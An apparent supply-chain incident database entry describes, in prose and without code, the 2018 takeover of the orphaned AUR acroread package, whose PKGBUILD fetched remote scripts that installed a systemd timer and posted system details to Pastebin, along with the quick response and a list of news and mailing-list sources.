AUR acroread PKGBUILD ran remote shell scripts

The acroread incident was a small compromise, but it is a clean example of how community package metadata becomes a distribution point. Adobe Reader was not backdoored upstream, and Arch's official binary repositories were not compromised. The poisoned layer was the AUR package recipe that Arch users could pull into a normal local build.

The package was attractive because nobody was actively maintaining it. acroread wrapped an old Linux build of Adobe Reader, a native version no longer supported by Adobe. On July 8, 2018, Arch users noticed that an AUR account named xeactor had adopted the orphaned package and pushed a PKGBUILD change with the classic red flag: a remote script fetched from ptpb.pw and piped into bash.

That first script was not noisy malware. It staged the rest of the intrusion. The script created xeactor.service and xeactor.timer under systemd paths, set the timer to run every 360 seconds, and downloaded a second script from ptpb.pw. The second script collected system details and posted them to Pastebin through an API key. Public analysis did not find a self-update mechanism or a destructive payload, but the installer path had already crossed the important line: a trusted community build recipe was executing attacker-controlled shell code during installation.

The response was fast. The report hit the aur-general list at 05:48 UTC on July 8. Six minutes later, Trusted User Eli Schwartz said the account had been suspended and the commit reverted. He then found and fixed two other packages that had been modified the same way. Arch later named the affected versions as acroread 9.5.5-8, balz 1.20-3, and minergate 8.1-2.

The important boundary is scope. AUR is user-produced content and has always carried a review burden for the user. That does not make the incident irrelevant to supply-chain history; it makes the trust lesson more precise. The attacker did not need to compromise Adobe, Arch package signing, or pacman. They needed an abandoned AUR package, a plausible maintainer action, and an install script that too many users would let run without reading.

Motive

Data Collection

Attribution

Person

Cause

Orphaned Package Takeover

Transitive

No

Actor

xeactor

• aur-general: acroread package compromisedlists.archlinux.org
• aur-general: acroread package compromised responselists.archlinux.org
• aur-general: two other packages modified the same waylists.archlinux.org
• aur-general: orphaned packages were adoptedlists.archlinux.org
• aur-general: affected package versionslists.archlinux.org
• Malware found in the Arch Linux AUR repositorylwn.net
• Malware Found in Arch Linux AUR Package Repositorybleepingcomputer.com
• Arch Linux PDF reader package poisonedtheregister.com
• Mirrored first-stage ptpb.pw scriptgist.github.com
• Mirrored second-stage ptpb.pw scriptgist.github.com
• Arch Linux AUR Repository Found to Contain Malwaresensorstechforum.com
• Malware found in Arch AUR repositoryblog.desdelinux.net
• Malware discovered in Arch Linux AUR packageslinuxiac.com
• Arch AUR under fire once more as malware resurfaceslinuxiac.com
• Arch's AUR battles DDoS attacks and persistent malware all summerfossforce.com